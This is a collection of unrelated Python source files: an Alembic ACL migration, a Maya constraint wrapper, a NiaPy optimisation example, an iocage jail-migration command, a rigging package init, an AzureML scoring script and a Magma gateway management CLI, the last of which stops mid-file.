sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('type', sa.String(length=50), nullable=True),
sa.Column('acl_id', sa.String(length=36), nullable=True),
sa.ForeignKeyConstraint(['acl_id'], ['explicit_acls_acl.id'], name=op.f('fk_explicit_acls_actor_acl_id_explicit_acls_acl')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_explicit_acls_actor'))
)
op.create_table('explicit_acls_defaultacl',
sa.Column('id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['id'], ['explicit_acls_acl.id'], name=op.f('fk_explicit_acls_defaultacl_id_explicit_acls_acl')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_explicit_acls_defaultacl'))
)
op.create_table('explicit_acls_elasticsearchacl',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('record_selector', JSON(astext_type=sa.Text()), nullable=True),
sa.ForeignKeyConstraint(['id'], ['explicit_acls_acl.id'], name=op.f('fk_explicit_acls_elasticsearchacl_id_explicit_acls_acl')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_explicit_acls_elasticsearchacl'))
)
op.create_table('explicit_acls_idacl',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('record_id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['id'], ['explicit_acls_acl.id'], name=op.f('fk_explicit_acls_idacl_id_explicit_acls_acl')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_explicit_acls_idacl'))
)
op.create_table('explicit_acls_system_role',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('authenticated', sa.Boolean(), nullable=True),
sa.Column('anonymous', sa.Boolean(), nullable=True),
sa.ForeignKeyConstraint(['id'], ['explicit_acls_actor.id'], name=op.f('fk_explicit_acls_system_role_id_explicit_acls_actor')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_explicit_acls_system_role'))
)
op.create_table('explicit_acls_roleactor',
sa.Column('id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['id'], ['explicit_acls_actor.id'], name=op.f('fk_explicit_acls_roleactor_id_explicit_acls_actor')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_explicit_acls_roleactor'))
)
op.create_table('explicit_acls_useractor',
sa.Column('id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['id'], ['explicit_acls_actor.id'], name=op.f('fk_explicit_acls_useractor_id_explicit_acls_actor')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_explicit_acls_useractor'))
)
op.create_table('explicit_acls_roles_roleactors',
sa.Column('role_id', sa.Integer(), nullable=False),
sa.Column('actor_id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['actor_id'], ['explicit_acls_roleactor.id'], name=op.f('fk_explicit_acls_roles_roleactors_actor_id_explicit_acls_roleactor')),
sa.ForeignKeyConstraint(['role_id'], ['accounts_role.id'], name=op.f('fk_explicit_acls_roles_roleactors_role_id_accounts_role')),
sa.PrimaryKeyConstraint('role_id', 'actor_id', name=op.f('pk_explicit_acls_roles_roleactors'))
)
op.create_table('explicit_acls_users_useractors',
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('actor_id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['actor_id'], ['explicit_acls_useractor.id'], name=op.f('fk_explicit_acls_users_useractors_actor_id_explicit_acls_useractor')),
sa.ForeignKeyConstraint(['user_id'], ['accounts_user.id'], name=op.f('fk_explicit_acls_users_useractors_user_id_accounts_user')),
sa.PrimaryKeyConstraint('user_id', 'actor_id', name=op.f('pk_explicit_acls_users_useractors'))
)
# ### end Alembic commands ###
def downgrade():
"""Downgrade database."""
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('explicit_acls_users_useractors')
op.drop_table('explicit_acls_roles_roleactors')
op.drop_table('explicit_acls_useractor')
op.drop_table('explicit_acls_roleactor')
op.drop_table('explicit_acls_system_role')
op.drop_table('explicit_acls_idacl')
op.drop_table('explicit_acls_elasticsearchacl')
op.drop_table('explicit_acls_defaultacl')
op.drop_table('explicit_acls_actor')
op.drop_index(op.f('ix_explicit_acls_acl_originator_id'), table_name='explicit_acls_acl')
op.drop_table('explicit_acls_acl')
# ### end Alembic commands ###
|
python
|
from language_learner_env import secret_settings
import learner
app = learner.App(secret_settings)
app.listen()
|
python
|
from maya import cmds as mc
from maya.api import OpenMaya as om
from dcc.maya.libs import transformutils
from . import transformmixin
import logging
logging.basicConfig()
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
class ConstraintMixin(transformmixin.TransformMixin):
"""
Overload of TransformMixin class used to interface with constraint nodes.
"""
__apitype__ = (om.MFn.kConstraint, om.MFn.kPluginConstraintNode)
__targets__ = {
'translateX': 'targetTranslateX',
'translateY': 'targetTranslateY',
'translateZ': 'targetTranslateZ',
'rotatePivotX': 'targetRotatePivotX',
'rotatePivotY': 'targetRotatePivotY',
'rotatePivotZ': 'targetRotatePivotZ',
'rotatePivotTranslateX': 'targetRotateTranslateX',
'rotatePivotTranslateY': 'targetRotateTranslateY',
'rotatePivotTranslateZ': 'targetRotateTranslateZ',
'scalePivotX': 'targetScalePivotX',
'scalePivotY': 'targetScalePivotY',
'scalePivotZ': 'targetScalePivotZ',
'scalePivotTranslateX': 'targetScaleTranslateX',
'scalePivotTranslateY': 'targetScaleTranslateY',
'scalePivotTranslateZ': 'targetScaleTranslateZ',
'rotateX': 'targetRotateX',
'rotateY': 'targetRotateY',
'rotateZ': 'targetRotateZ',
'rotateOrder': 'targetRotateOrder',
'jointOrientX': 'targetJointOrientX',
'jointOrientY': 'targetJointOrientY',
'jointOrientZ': 'targetJointOrientZ',
'scaleX': 'targetScaleX',
'scaleY': 'targetScaleY',
'scaleZ': 'targetScaleZ',
'inverseScale': 'targetInverseScale',
'segmentScaleCompensate': 'targetScaleCompensate'
}
__outputs__ = {
'constraintTranslateX': 'translateX',
'constraintTranslateY': 'translateY',
'constraintTranslateZ': 'translateZ',
'constraintRotateX': 'rotateX',
'constraintRotateY': 'rotateY',
'constraintRotateZ': 'rotateZ',
'constraintScaleX': 'scaleX',
'constraintScaleY': 'scaleY',
'constraintScaleZ': 'scaleZ'
}
def __init__(self, *args, **kwargs):
"""
Private method called after a new instance has been created.
"""
# Call parent method
#
super(ConstraintMixin, self).__init__(*args, **kwargs)
def constraintObject(self):
"""
Returns the object being driven by this constraint node.
The constraint parent inverse matrix plug is usually the common denominator in all constraint nodes.
It should be fairly safe to query the connection to find this object.
:rtype: mpynode.MPyNode
"""
# Check if plug has a connection
#
plug = self.findPlug('constraintParentInverseMatrix')
source = plug.source()
if not source.isNull:
return self.pyFactory(source.node())
else:
return None
def setConstraintObject(self, constraintObject, **kwargs):
"""
Updates the constraint object for this instance.
:type constraintObject: mpy.mpynode.MPyNode
:key maintainOffset: bool
:key skipTranslateX: bool
:key skipTranslateY: bool
:key skipTranslateZ: bool
:key skipRotateX: bool
:key skipRotateY: bool
:key skipRotateZ: bool
:key skipScaleX: bool
:key skipScaleY: bool
:key skipScaleZ: bool
:rtype: None
"""
# Check for redundancy
#
if constraintObject == self.constraintObject():
return
# Re-parent this constraint
#
self.setParent(constraintObject)
# Update constraint name
#
constraintName = '{nodeName}_{typeName}1'.format(nodeName=constraintObject.displayName(), typeName=self.typeName)
self.setName(constraintName)
# Update rest matrix
#
restMatrix = constraintObject.getAttr('matrix')
self.setRestMatrix(restMatrix)
# Connect output attributes
#
for (sourceName, destinationName) in self.__outputs__.items():
# Check if attribute should be skipped
#
attributeName = destinationName[0].upper() + destinationName[1:]
key = 'skip{attributeName}'.format(attributeName=attributeName)
skipAttribute = kwargs.get(key, False)
if skipAttribute:
log.info('Skipping constraint attribute: %s' % destinationName)
continue
# Check if attributes exist
#
if not self.hasAttr(sourceName) or not constraintObject.hasAttr(destinationName):
log.info('Unable to locate constraint attributes: %s and %s' % (sourceName, destinationName))
continue
# Get associated plugs
#
source = self.findPlug(sourceName)
destination = constraintObject.findPlug(destinationName)
# Connect plugs
#
self.breakConnections(source, source=False, destination=True)
self.connectPlugs(source, destination, force=True)
# Update constraint parent inverse matrix
#
source = constraintObject.findPlug('parentInverseMatrix[%s]' % constraintObject.instanceNumber())
destination = self.findPlug('constraintParentInverseMatrix')
constraintObject.connectPlugs(source, destination, force=True)
# Check if constraint supports rotation order
# This is only seen in orient and transform constraints
#
if self.hasAttr('constraintRotateOrder'):
constraintObject.connectPlugs('rotateOrder', self.findPlug('constraintRotateOrder'), force=True)
# Check if constraint supports joint orient
# This is only seen in orient and transform constraints
#
if self.hasAttr('constraintJointOrient') and constraintObject.hasAttr('jointOrient'):
# Connect child plugs
#
source = constraintObject.findPlug('jointOrient')
destination = self.findPlug('constraintJointOrient')
for i in range(source.numChildren()):
constraintObject.connectPlugs(source.child(i), destination.child(i), force=True)
def interpolationType(self):
"""
Getter method used to retrieve the interpolation type for this constraint.
:rtype: int
"""
return om.MPlug(self.object(), self.attribute('interpType')).asInt()
def setInterpolationType(self, interpolationType):
"""
Setter method used to update the interpolation type for this constraint.
:type interpolationType: int
:rtype: None
"""
om.MPlug(self.object(), self.attribute('interpType')).setInt(interpolationType)
def offset(self):
"""
Getter method used to retrieve the offset for this constraint.
Only a few constraints support this method such as point and orient constraints!
:rtype: om.MVector
"""
return om.MVector(
om.MPlug(self.object(), self.attribute('offsetX')).asFloat(),
om.MPlug(self.object(), self.attribute('offsetY')).asFloat(),
om.MPlug(self.object(), self.attribute('offsetZ')).asFloat()
)
def setOffset(self, offset):
"""
Setter method used to update the offset for this constraint.
Only a few constraints support this method such as point and orient constraints!
:type offset: om.MVector
:rtype: None
"""
om.MPlug(self.object(), self.attribute('offsetX')).setFloat(offset.x)
om.MPlug(self.object(), self.attribute('offsetY')).setFloat(offset.y)
om.MPlug(self.object(), self.attribute('offsetZ')).setFloat(offset.z),
def targets(self):
"""
Collects all of the available constraint targets.
:rtype: list[ConstraintTarget]
"""
return list(self.iterTargets())
def targetObjects(self):
"""
Retrieves the target objects driving this constraint.
:rtype: list[mpynode.MPyNode]
"""
return [x.targetObject() for x in self.iterTargets()]
def iterTargets(self):
"""
Generator method used to iterate through all available constraint targets.
:rtype: iter
"""
# Iterate through target indices
#
for i in range(self.targetCount()):
yield ConstraintTarget(self, index=i)
def targetCount(self):
"""
Evaluates the number of active target elements available.
:rtype: int
"""
return om.MPlug(self.object(), self.attribute('target')).evaluateNumElements()
def addTarget(self, target, maintainOffset=True):
"""
Adds a new target to this constraint.
:type target: mpynode.MPyNode
:type maintainOffset: bool
:rtype: int
"""
# Iterate through required target attributes
#
plug = self.findPlug('target')
index = plug.evaluateNumElements()
for (sourceName, destinationName) in self.__targets__.items():
# Check if constraint has attribute
#
if not target.hasAttr(sourceName) or not self.hasAttr(destinationName):
log.info('Unable to locate constraint attributes: %s and %s' % (sourceName, destinationName))
continue
# Connect plugs
#
source = target.findPlug(sourceName)
destination = self.findPlug('target[%s].%s' % (index, destinationName))
self.connectPlugs(source, destination)
# Connect parent matrix attribute
#
source = target.findPlug('parentMatrix[%s]' % target.instanceNumber())
destination = self.findPlug('target[%s].targetParentMatrix' % index)
self.connectPlugs(source, destination)
# Connect weight attributes
#
nodeName = target.displayName()
attribute = self.addAttr(
longName='{nodeName}W{index}'.format(nodeName=nodeName, index=index),
attributeType='float',
min=0.0, max=1.0
)
source = om.MPlug(self.object(), attribute)
destination = self.findPlug('target[%s].targetWeight' % index)
self.connectPlugs(source, destination)
# Enable weight attribute
#
source.setFloat(1.0)
# Return new target index
#
return index
def addTargets(self, targets, maintainOffset=False):
"""
Adds a list of new targets to this constraint.
:type targets: list[mpynode.MPyNode]
:type maintainOffset: bool
:rtype: int
"""
for target in targets:
self.addTarget(target, maintainOffset=maintainOffset)
def removeTarget(self, index):
pass
def restTranslate(self, context=om.MDGContext.kNormal):
"""
Returns the rest translate component from this constraint.
This value is used when there are no target weights.
:type context: om.MDGContext
:rtype: om.MVector
"""
return om.MVector(
self.findPlug('restTranslateX').asFloat(context=context),
self.findPlug('restTranslateY').asFloat(context=context),
self.findPlug('restTranslateZ').asFloat(context=context)
)
def setRestTranslate(self, restTranslate):
"""
Updates the rest translate for this constraint.
:type restTranslate: om.MVector
:rtype: None
"""
# Assign translation to plug
#
self.findPlug('restTranslateX').setFloat(restTranslate.x)
self.findPlug('restTranslateY').setFloat(restTranslate.y)
self.findPlug('restTranslateZ').setFloat(restTranslate.z)
def restRotate(self, context=om.MDGContext.kNormal):
"""
Returns the rest rotation component from this constraint.
This value is used when there are no target weights.
:type context: om.MDGContext
:rtype: om.MEulerRotation
"""
return om.MEulerRotation(
self.findPlug('restRotateX').asFloat(context=context),
self.findPlug('restRotateY').asFloat(context=context),
self.findPlug('restRotateZ').asFloat(context=context),
order=self.rotateOrder(context=context)
)
def setRestRotate(self, restRotation):
"""
Updates the rest rotate for this constraint.
:type restRotation: om.MEulerRotation
:rtype: None
"""
# Check if rotation needs reordering
#
rotateOrder = self.rotateOrder()
if restRotation.order != rotateOrder:
restRotation = restRotation.reorder(rotateOrder)
# Assign rotation to plugs
#
self.findPlug('restRotateX').setFloat(restRotation.x)
self.findPlug('restRotateY').setFloat(restRotation.y)
self.findPlug('restRotateZ').setFloat(restRotation.z)
def restScale(self, context=om.MDGContext.kNormal):
"""
Returns the rest translate component from this constraint.
This value is used when there are no target weights.
:type context: om.MDGContext
:rtype: list[float, float, float]
"""
return [
self.findPlug('restScaleX').asFloat(context=context),
self.findPlug('restScaleY').asFloat(context=context),
self.findPlug('restScaleZ').asFloat(context=context)
]
def setRestScale(self, restScale):
"""
Updates the rest translate for this constraint.
:type restScale: list[float, float, float]
:rtype: None
"""
# Assign scale to plugs
#
self.findPlug('restScaleX').setFloat(restScale[0])
self.findPlug('restScaleY').setFloat(restScale[1])
self.findPlug('restScaleZ').setFloat(restScale[2])
def restMatrix(self):
"""
Computes a transform matrix based off the rest components.
:rtype: om.MMatrix
"""
# Compose rest matrix
#
translateMatrix = transformutils.createTranslateMatrix(self.restTranslate())
rotateMatrix = transformutils.createRotationMatrix(self.restRotate())
scaleMatrix = transformutils.createScaleMatrix(1.0)
return scaleMatrix * rotateMatrix * translateMatrix
def setRestMatrix(self, restMatrix):
"""
Updates the rest matrix for this constraint by changing the rest components.
:type restMatrix: om.MMatrix
:rtype: None
"""
# Decompose rest matrix
#
translate, rotate, scale = transformutils.decomposeTransformMatrix(restMatrix, rotateOrder=self.rotateOrder())
# Check if constraint has rest translate
#
if self.hasAttr('restTranslate'):
self.setRestTranslate(translate)
# Check if constraint has rest rotate
#
if self.hasAttr('restRotate'):
self.setRestRotate(rotate)
# Check if constraint has rest scale
#
if self.hasAttr('restScale'):
self.setRestScale(scale)
def restInverseMatrix(self):
"""
Retrieves the inverse rest matrix.
:rtype: om.MMatrix
"""
return self.restMatrix().inverse()
def worldRestMatrix(self):
"""
Computes the world rest matrix for this constraint.
:rtype: om.MMatrix
"""
return self.restMatrix() * self.exclusiveMatrix()
def worldRestInverseMatrix(self):
"""
Retrieves the inverse world rest matrix for this constraint.
:rtype: om.MMatrix
"""
return self.worldRestMatrix().inverse()
class ConstraintTarget(object):
"""
Base class used to interface with constraint targets.
"""
__slots__ = ('_constraint', '_index')
def __init__(self, constraint, **kwargs):
"""
Private method called after a new instance has been created.
:type constraint: ConstraintMixin
:rtype: None
"""
# Call parent method
#
super(ConstraintTarget, self).__init__()
# Declare class variables
#
self._constraint = constraint.weakReference()
self._index = kwargs.get('index', 0)
@property
def constraint(self):
"""
Getter method used to retrieve the associated constraint for this target.
:rtype: ConstraintMixin
"""
return self._constraint()
@property
def index(self):
"""
Getter method used to retrieve the index for this constraint target.
:rtype: int
"""
return self._index
def targetPlug(self):
"""
Returns the element associated with this constraint target.
:rtype: om.MPlug
"""
return self.constraint.findPlug('target[{index}]'.format(index=self.index))
def targetChildPlug(self, name):
"""
Search method used to locate the child plug derived from this constraint target.
:type name: str
:rtype: om.MPlug
"""
return self.targetPlug().child(self.constraint.attribute(name))
def name(self):
"""
Returns the alias name for this constraint target.
:rtype: str
"""
return self.targetChildPlug('targetWeight').source().partialName(useLongNames=True)
def setName(self, name):
"""
Method used to change the alias name on the indexed weight attribute.
:type name: str
:rtype: bool
"""
# Get source connection from target weight plug
#
plug = self.targetChildPlug('targetWeight')
otherPlug = plug.source()
if otherPlug.isNull:
return
# Rename user attribute
#
fullPathName = self.constraint.fullPathName()
fnAttribute = om.MFnAttribute(otherPlug.attribute())
mc.renameAttr('%s.%s' % (fullPathName, fnAttribute.shortName), name)
mc.renameAttr('%s.%s' % (fullPathName, fnAttribute.name), name)
def weight(self):
"""
Returns the weight for this constraint target.
:rtype: float
"""
return self.targetChildPlug('targetWeight').asFloat()
def targetObject(self):
"""
Retrieves the target object driving this constraint channel.
If no source connection is found then none will be returned!
:rtype: mpynode.MPyNode
"""
plug = self.targetChildPlug('targetParentMatrix')
source = plug.source()
if not source.isNull:
return self.constraint.pyFactory(source.node())
else:
return None
def targetRotateOrder(self):
"""
Retrieves the rotate order for this constraint target.
:rtype: int
"""
return self.targetChildPlug('targetRotateOrder').asInt()
def targetOffsetTranslate(self):
"""
Retrieves the offset translation for this constraint target.
This method is only supported by parent constraints!
:rtype: om.MVector
"""
return om.MVector(
self.targetChildPlug('targetOffsetTranslateX').asFloat(),
self.targetChildPlug('targetOffsetTranslateY').asFloat(),
self.targetChildPlug('targetOffsetTranslateZ').asFloat()
)
def setTargetOffsetTranslate(self, translation):
"""
Updates the offset translation for this constraint target.
:type translation: om.MVector
:rtype: None
"""
self.targetChildPlug('targetOffsetTranslateX').setFloat(translation.x)
self.targetChildPlug('targetOffsetTranslateY').setFloat(translation.y)
self.targetChildPlug('targetOffsetTranslateZ').setFloat(translation.z)
def targetOffsetRotate(self):
"""
Retrieves the offset rotation for this constraint target.
This method is only supported by parent constraints!
:rtype: om.MEulerRotation
"""
return om.MEulerRotation(
self.targetChildPlug('targetOffsetRotateX').asFloat(),
self.targetChildPlug('targetOffsetRotateY').asFloat(),
self.targetChildPlug('targetOffsetRotateZ').asFloat(),
order=self.targetRotateOrder()
)
def setTargetOffsetRotate(self, rotation):
"""
Updates the offset rotation for this constraint target.
:type rotation: om.MEulerRotation
:rtype: None
"""
# Check if rotation needs reordering
#
rotateOrder = self.targetRotateOrder()
if rotation.order != rotateOrder:
rotation = rotation.reorder(rotateOrder)
# Assign rotation to plugs
#
self.targetChildPlug('targetOffsetRotateX').setFloat(rotation.x)
self.targetChildPlug('targetOffsetRotateY').setFloat(rotation.y)
self.targetChildPlug('targetOffsetRotateZ').setFloat(rotation.z)
def resetOffsetTransform(self):
pass
|
python
|
# encoding=utf8
# This is temporary fix to import module from parent folder
# It will be removed when package is published on PyPI
import sys
sys.path.append('../')
# End of fix
import numpy as np
from NiaPy.task import StoppingTask, OptimizationType
from NiaPy.algorithms import BasicStatistics
from NiaPy.algorithms.basic import DifferentialEvolution
from NiaPy.benchmarks import Sphere
NUM_RUNS = 10 # define number of runs
stats = np.zeros(NUM_RUNS)
for i in range(NUM_RUNS):
task = StoppingTask(D=10, nFES=10000, optType=OptimizationType.MINIMIZATION, benchmark=Sphere())
print ("Working on run: " + str(i+1))
algo = DifferentialEvolution(NP=40, CR=0.9, F=0.5)
best = algo.run(task)
stats[i] = best[1] # save best
stat = BasicStatistics(stats)
print(stat.generate_standard_report()) # generate report
|
python
|
# Copyright (c) 2014-2017, iocage
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted providing that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Migrate jails to the latest format (python-iocage)."""
import typing
import click
import libioc.events
import libioc.errors
import libioc.helpers
import libioc.Jails
import libioc.Logger
from .shared.click import IocClickContext
__rootcmd__ = True
class JailMigrationEvent(libioc.events.IocEvent):
"""CLI event that occurs when a jail is migrated from legacy format."""
def __init__(
self,
jail: 'libioc.Jail.JailGenerator'
) -> None:
self.identifier = jail.full_name
libioc.events.IocEvent.__init__(self)
@click.command(name="migrate", help="Migrate jails to the latest format.")
@click.pass_context
@click.argument("jails", nargs=-1)
def cli(
ctx: IocClickContext,
jails: typing.Tuple[str, ...]
) -> None:
"""Start one or many jails."""
logger = ctx.parent.logger
zfs = libioc.ZFS.get_zfs(logger=logger)
host = libioc.Host.HostGenerator(logger=logger, zfs=zfs)
filters = jails + ("template=no,-",)
ioc_jails = libioc.Jails.JailsGenerator(
filters,
logger=logger,
host=host,
zfs=zfs
)
if len(ioc_jails) == 0:
logger.error(f"No jails started your input: {jails}")
exit(1)
ctx.parent.print_events(_migrate_jails(
ioc_jails,
logger=logger,
zfs=zfs,
host=host
))
def _migrate_jails(
jails: 'libioc.Jails.JailsGenerator',
logger: 'libioc.Logger.Logger',
host: 'libioc.Host.HostGenerator',
zfs: 'libioc.ZFS.ZFS'
) -> typing.Generator['libioc.events.IocEvent', None, None]:
for jail in jails:
event = JailMigrationEvent(jail=jail)
yield event.begin()
if jail.config.legacy is False:
yield event.skip()
continue
if jail.running is True:
yield event.fail(libioc.errors.JailAlreadyRunning(
jail=jail,
logger=logger
))
continue
if libioc.helpers.validate_name(jail.config["tag"]):
name = jail.config["tag"]
temporary_name = name
else:
name = jail.humanreadable_name
temporary_name = "import-" + str(hash(name) % (1 << 32))
try:
new_jail = libioc.Jail.JailGenerator(
dict(name=temporary_name),
root_datasets_name=jail.root_datasets_name,
new=True,
logger=logger,
zfs=zfs,
host=host
)
if new_jail.exists is True:
raise libioc.errors.JailAlreadyExists(
jail=new_jail,
logger=logger
)
def _destroy_unclean_migration() -> typing.Generator[
'libioc.events.IocEvents',
None,
None
]:
_name = new_jail.humanreadable_name
logger.verbose(
f"Destroying unfinished migration target jail {_name}"
)
yield from new_jail.destroy(
force=True,
event_scope=event.scope
)
event.add_rollback_step(_destroy_unclean_migration)
yield from new_jail.clone_from_jail(jail, event_scope=event.scope)
new_jail.save()
new_jail.promote()
yield from jail.destroy(
force=True,
force_stop=True,
event_scope=event.scope
)
except libioc.errors.IocException as e:
yield event.fail(e)
continue
if name != temporary_name:
# the jail takes the old jails name
yield from new_jail.rename(name, event_scope=event.scope)
yield event.end()
|
python
|
"""Anvil is a tool for automating the rigging process in a given DCC."""
from six import itervalues
import config
import utils
import colors
import meta_data
import log
import version
import interfaces
import runtime
import objects
import grouping
import node_types
import sub_rig_templates
import rig_templates
class AnvilLog(log.LogMixin):
LOG = log.obtain_logger(__name__)
LOG = AnvilLog
LOG.info('Auto-Loaded DCC %s', runtime.dcc)
LOG.info('Loaded logger config file %s successfully, writing to: %s',
log.LogInitializer.CFG_FILE, log.LogInitializer.LOG_DIR)
LOG.info('Anvil environment has been set to %s', config.ENV)
LOG.info('Successfully initiated Anvil %s.', version.__version__)
EXISTING_ENCAPSULATIONS = {}
def check_for_encapsulation(dag_path):
"""Helper for the factory method to check for a previously existing encapsulation."""
for node_encapsulation in itervalues(EXISTING_ENCAPSULATIONS):
if dag_path == node_encapsulation._dcc_id:
return node_encapsulation
return None
def factory(dag_path, **kwargs):
"""Factory method that checks for previous encapsulations to reduce memory footprint and encourages reuse."""
if dag_path is None:
raise IOError('Tried to factory encapsulate None.')
if is_anvil(dag_path):
return dag_path
existing = check_for_encapsulation(runtime.dcc.scene.get_persistent_id(str(dag_path)))
if existing is not None:
return existing
node_type = runtime.dcc.scene.get_type(dag_path)
if node_type in config.DCC_TYPES[config.TRANSFORM_TYPE]:
encapsulation_class = objects.Transform
elif node_type in config.DCC_TYPES[config.CURVE_TYPE]:
encapsulation_class = objects.Curve
elif node_type in config.DCC_TYPES[config.JOINT_TYPE]:
encapsulation_class = objects.Joint
else:
encapsulation_class = objects.Transform
encapsulation = encapsulation_class(dag_path, **kwargs)
register_encapsulation(encapsulation)
return encapsulation
def factory_list(dag_nodes):
"""Factory method that iterates over a list and returns a list."""
return [factory(node) for node in dag_nodes]
def register_encapsulation(anvil_class_instance):
"""Helper to register a given encapsulation with the encapsulation registry."""
EXISTING_ENCAPSULATIONS[len(EXISTING_ENCAPSULATIONS)] = anvil_class_instance
def is_achunk(node):
issubclass(type(node), node_types.BaseCollection)
def is_agrouping(node):
return issubclass(type(node), node_types.AbstractGrouping)
def is_aobject(node):
return issubclass(type(node), node_types.UnicodeDelegate)
def is_aiter(node):
return is_agrouping(node) or is_achunk(node)
def is_anvil(node):
return is_aiter(node) or is_aobject(node)
__all__ = ['config',
'meta_data',
'interfaces',
'log',
'version',
'node_types',
'runtime',
'objects',
'grouping',
'sub_rig_templates',
'rig_templates',
'utils',
'colors']
|
python
|
import numpy as np
import pandas as pd
import os
from transformers import AutoModel
from inference_schema.schema_decorators import input_schema, output_schema
from inference_schema.parameter_types.pandas_parameter_type import PandasParameterType
from inference_schema.parameter_types.numpy_parameter_type import NumpyParameterType
def init():
global model
model_path = os.getenv("AZUREML_MODEL_DIR")
model = AutoModel.from_pretrained(model_path, from_tf=True)
input_sample = pd.DataFrame(data=[{'query': "AzureML is quite good."}])
output_sample = np.array([np.array(["POSITIVE", 0.95])])
@input_schema('data', PandasParameterType(input_sample))
@output_schema(NumpyParameterType(output_sample))
def run(data):
try:
text = data['query']
sentiment = model(text)
result = {}
result['sentiment'] = sentiment
return result
except Exception as e:
error = str(e)
return error
|
python
|
#!/usr/bin/env python3
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
from google.protobuf import json_format
from google.protobuf.struct_pb2 import Struct
from magma.common.rpc_utils import grpc_wrapper
from orc8r.protos import common_pb2, magmad_pb2, magmad_pb2_grpc
@grpc_wrapper
def start_services(client, args):
client.StartServices(common_pb2.Void())
@grpc_wrapper
def stop_services(client, args):
client.StopServices(common_pb2.Void())
@grpc_wrapper
def reboot(client, args):
client.Reboot(common_pb2.Void())
@grpc_wrapper
def restart_services(client, args):
client.RestartServices(
magmad_pb2.RestartServicesRequest(services=args.services)
)
@grpc_wrapper
def ping(client, args):
response = client.RunNetworkTests(
magmad_pb2.NetworkTestRequest(
pings=[
magmad_pb2.PingParams(
host_or_ip=host,
num_packets=args.packets,
) for host in args.hosts
]
)
)
print(response)
@grpc_wrapper
def traceroute(client, args):
response = client.RunNetworkTests(
magmad_pb2.NetworkTestRequest(
traceroutes=[
magmad_pb2.TracerouteParams(
host_or_ip=host,
max_hops=args.max_hops,
bytes_per_packet=args.bytes,
) for host in args.hosts
]
)
)
print(response)
@grpc_wrapper
def get_gateway_id(client, args):
response = client.GetGatewayId(common_pb2.Void())
print(response)
@grpc_wrapper
def generic_command(client, args):
params = json_format.Parse(args.params, Struct())
response = client.GenericCommand(
magmad_pb2.GenericCommandParams(command=args.command, params=params)
)
print(response)
@grpc_wrapper
def tail_logs(client, args):
stream = client.TailLogs(magmad_pb2.TailLogsRequest(service=args.service))
for log_line in stream:
print(log_line.line, end='')
def create_parser():
"""
Creates the argparse parser with all the arguments.
"""
parser = argparse.ArgumentParser(
description='Management CLI for Magmad',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# Add subcommands
subparsers = parser.add_subparsers(title='subcommands', dest='cmd')
parser_start = subparsers.add_parser('start_services',
help='Start all magma services')
parser_stop = subparsers.add_parser('stop_services',
help='Stop all magma services')
parser_reboot = subparsers.add_parser('reboot',
help='Reboot the gateway device')
parser_restart = subparsers.add_parser('restart_services',
help='Restart specified magma services')
parser_ping = subparsers.add_parser(
'ping',
help='Ping a host from the gateway')
parser_traceroute = subparsers.add_parser(
'traceroute',
help='traceroute a host from the gateway')
parser_get_id = subparsers.add_parser('get_gateway_id',
help='Get gateway hardware ID')
parser_generic_command = subparsers.add_parser('generic_command',
help='Execute generic command')
parser_tail_logs = subparsers.add_parser('tail_logs',
help='Tail logs')
parser_ping.add_argument('hosts', nargs='+', type=str,
help='Hosts (URLs or IPs) to ping')
parser_ping.add_argument('--packets', type=int, default=4,
help='Number of packets to send with each ping')
parser_traceroute.add_argument('hosts', nargs='+', type=str,
help='Hosts (URLs or IPs) to traceroute')
parser_traceroute.add_argument('--max-hops', type=int, default=30,
help='Max TTL for packets, defaults to 30')
parser_traceroute.add_argument('--bytes', type=int, default=60,
help='Bytes per packet, defaults to 60')
parser_restart.add_argument('services', nargs='*', type=str,
help='Services to restart')
parser_generic_command.add_argument('command', type=str,
help='Command name')
parser_generic_command.add_argument('params', type=str,
help='Params (string)')
parser_tail_logs.add_argument('service', type=str, nargs='?',
